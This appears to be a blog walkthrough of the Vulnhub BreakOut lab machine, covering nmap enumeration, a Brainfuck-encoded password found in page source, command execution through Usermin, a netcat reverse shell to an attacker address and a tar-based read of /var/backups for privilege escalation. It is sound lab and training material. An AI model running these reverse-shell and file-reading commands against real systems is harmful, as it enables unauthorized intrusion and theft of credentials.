Vulnhub BreakOut — A Detailed Walkthrough.

Photo by FLY:D on Unsplash

Enumeration

As you might have guessed it, the first thing I did was scan the box using nmap to see what ports are open and what services are running on them.

┌──(kali㉿kali)-[~]
└─$ nmap -p- -A -T4 192.168.118.147
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-28 10:46 EDT
Nmap scan report for 192.168.118.147
Host is up (0.00071s latency).
Not shown: 65530 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.51 ((Debian))
|_http-server-header: Apache/2.4.51 (Debian)
|_http-title: Apache2 Debian Default Page: It works
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2

10000/tcp open http MiniServ 1.981 (Webmin httpd)
|_http-title: 200 — Document follows
20000/tcp open http MiniServ 1.830 (Webmin httpd)
|_http-server-header: MiniServ/1.830
|_http-title: 200 — Document follows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-05-28T14:46:42
|_ start_date: N/A
|_nbstat: NetBIOS name: BREAKOUT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.36 seconds
<!--
don't worry no one will get here, it's safe to share with you my access. Its encrypted :)
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.-->
enum4linux scan results

Exploitation

And as expected, the credentials worked on the Usermin login page running on port 20000. After reading a bit on Usermin, I found that, it is used to manage applications remotely and this interface actually has a feature to run commands. And this gets us out user flag.

user flag

Privilege Escalation

Now that we have an initial foothold on the machine, lets enumerate further to see how we can escalate our privileges to gain root access.

nc 192.168.118.146 4444      (Run this command on the box)nc -nvlp 4444      (Run this command on the kali machine)
Reverse bash shell
cd /tmp/home/cyber/tar -cvf backups_archive.tar /var/backups
/home/cyber/tar -xvf backups_archive.tar

Conclusion

Thorough enumeration is the key to finding and exploiting vulnerabilities. The exploitation part becomes very easy once you have gathered a lot of info on a target. Look inside source codes, don’t forget to enumerate the web directories (I did in this case, but there wasn’t anything interesting so didn’t include it in the writeup as it would just make it unnecessarily longer), once you have an initial foothold, enumeration is the key again to escalate your privilege, look inside all the files and directories.

References

  1. Vulnhub BreakOut — https://www.vulnhub.com/entry/empire-breakout,751/
  2. Awesome article on TAR — https://www.lifewire.com/tar-file-2622386
  3. Awesome article on SMB enumeration — https://null-byte.wonderhowto.com/how-to/enumerate-smb-with-enum4linux-smbclient-0198049/

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Yashwardhan Chavan

Yashwardhan Chavan

“He who has a Why to live for can bear almost any How” | ethical hacker and cyber security enthusiast and I like to read and write.